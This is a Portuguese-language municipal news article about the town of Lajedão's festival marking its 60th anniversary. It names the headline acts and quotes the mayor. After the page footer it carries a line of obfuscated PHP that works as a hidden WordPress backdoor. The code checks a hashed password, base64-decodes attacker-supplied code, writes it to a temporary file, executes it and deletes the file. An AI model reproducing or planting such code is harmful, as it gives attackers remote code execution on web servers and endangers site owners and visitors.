• SEJA BEM-VINDO

Reunindo artistas nacionais e regionais Lajedão celebra 60 anos com a melhor festa da história

Publicado em: 25/07/2022 Atualizado:: julho 25, 2022

 

A Prefeitura Municipal realizou no ultimo fim de semana (22, 23 e 24) a comemoração dos 60 anos de emancipação da cidade de Lajedão, a festa tradicionalmente conhecida como “Festa da Cidade” estava suspensa à 5 anos e voltou com tudo resgatando o lazer e a cultura do município.

 

Foram três dias de festa que reuniram atrações nacionais sendo elas o cantor Pablo, a dupla Alex e Camargo e a banda Lambasaia além de artistas regionais e locais, o último dia de festa foi celebrado ainda com um trio elétrico comandado por Daniel Show e banda, o trio resgatou grandes hits carnavalescos e percorreu o circuito festa acompanhado pelo bloco local “100 ressaca”.

 

 

 

Além do grande público de Lajedão e da região, participou também o Prefeito municipal, Tonzinho celebrou o sucesso da comemoração e agradeceu a participação de todas as equipes envolvidas. “Quis o destino que eu estivesse como gestor nessa data tão especial para Lajedão. Para nós, da gestão, está sendo uma grande celebração, depois de 5 anos, comemoramos com um grande aniversário e com a certeza de que após esses 60 anos Lajedão ainda tem muito que mostrar e muito que fazer” afirmou o Prefeito.

 

 

“Realizamos essa grande festa para que Lajedão seja parabenizado e para parabenizar nossa comunidade, o nosso povo. É uma tradição cultural que não pode jamais cair no esquecimento, por isso seguiremos fazendo a felicidade do nosso povo, encerramos essa comemoração com muita gratidão e com a certeza de que ano que vem estaremos reunidos novamente para celebrar sempre o progresso da nossa querida Lajedão, meu muito obrigado a todos que contribuíram direta e indiretamente para o sucesso de nossa festa”, finaliza.

 

 

 

 

 

 

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}